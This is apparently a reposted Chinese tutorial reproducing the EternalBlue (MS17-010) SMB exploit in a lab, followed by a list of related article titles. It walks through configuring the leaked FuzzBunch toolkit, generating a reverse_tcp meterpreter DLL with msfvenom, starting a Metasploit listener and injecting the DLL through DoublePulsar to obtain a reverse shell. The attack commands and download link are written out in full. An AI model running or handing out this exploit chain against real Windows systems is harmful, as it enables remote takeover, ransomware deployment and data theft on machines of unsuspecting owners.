永恒之蓝EternalBlue(ms17-010)复现
来源:互联网 发布:云杉网络 编辑:程序博客网 时间:2024/05/06 06:52
前言
漏洞描述
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
漏洞复现
环境搭建
角色系统版本IP备注靶机windows 7 (x64)192.168.198.131打开445端口,关闭防火墙攻击机Kali-Linux-2017.2-vm-amd64192.168.198.141攻击机windows xp(x32)192.168.198.143安装python2.6.6以及pywin32-221windows xp(x32)环境搭建说明
安装Python 2.6
下载地址: https://www.python.org/download/releases/2.6/
安装PyWin32
下载地址:https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
说明:需要以管理员权限进行安装
配置fuzzbunch
Shadow Brokers工具包下载地址:https://github.com/misterch0c/shadowbroker.git/
在shadowbroker-master的子目录windows中新建listeningposts文件夹,同时修改FuzzyBunch.xml文件内容,设置相应的ResourcesDir和LogDir参数值,修改结果如下图所示。
配置fuzzbunch环境
配置目标IP地址和返回(本地)IP地址,设置Use Redirection选项为no(不重定向)。
新建项目,并给项目命名,其余设置保持默认(直接按Enter即可)。
使用永恒之蓝模块建立后门
根据目标的操作系统进行选择。
选择FB模块。
使用永恒之蓝建立后门成功,结果如下图。
kali生成s.dll木马程序
使用metasploit framework中的msfvenom来生成s.dll木马程序,具体命令为:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.198.141 LPORT=5555 -f dll > s.dll
可以通过ls查看。
说明:-p指定攻击载荷,LHOST指定监听地址,LPORT指定监听端口,-f指定木马程序格式为dll,>指定生成木马程序的保存路径,s.dll表示木马程序保存在当前目录下。
注:metasploit framework中的msfvenom其他具体参数可参考文档:http://www.freebuf.com/sectool/72135.html
kali下开启监听
输入命令:use exploit/multi/handler
使用payload:set payload windows/x64/meterpreter/reverse_tcp
使用show options查看哪些项目需要进行设置。
设置参数,命令如下:
命令(IP与端口参数与msfvenom的payload一致):
set LHOST 192.168.198.141
set LPORT 5555
结果如下图:
执行
注入s.dll木马程序
将前面生成的s.dll文件复制到系统windows xp C:\目录下。
在windows xp(x32)攻击机中使用Doublepulsar模块向靶机注入木马程序
选择64位操作系统
选择RunDLL,运行已有的木马程序,并输入木马程序位置。
kali反弹shell结果
- 永恒之蓝EternalBlue(ms17-010)复现
- 漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010
- 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
- ms17-010-永恒之蓝漏洞
- 【漏洞分析】MS17-010:深入分析“永恒之蓝”漏洞
- 永恒之蓝(EternalBlue)漏洞利用实例
- MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
- 永恒之蓝
- 永恒之蓝补丁
- 方程式 Eternalblue 漏洞利用复现
- 电脑病毒之随便聊聊--永恒之蓝
- 永恒之蓝漏洞紧急应对方案
- 如何避免被“永恒之蓝”盯上
- 永恒之蓝源码进一步剖析
- 永恒之蓝封445端口方法
- NSA Eternalblue SMB 远程溢出复现
- Metasploit的Docker安装及其Eternal Blue(永恒之蓝)渗透实现
- “永恒之蓝"漏洞的紧急应对--毕业生必看
- Testlink简介
- BAT经典试题之递归解决汉诺塔!
- cfA. Chess For Three
- SectionListView 属性讲解
- 安装黑苹果的历程
- 永恒之蓝EternalBlue(ms17-010)复现
- 本机无法打开SQL SERVER Configuretion Manager,修改注册表使sqlserver开启TCP/IP访问
- 通过vue-cli工具生成的vue项目中各文件的作用
- the house of orange解析
- 1037. 在霍格沃茨找零钱(20)--Python
- 20171124
- 使用sublime进行bib文献编译以及配置
- 几位成功投资者最珍视的理财箴言
- js拼接字符串时转义字符的妙用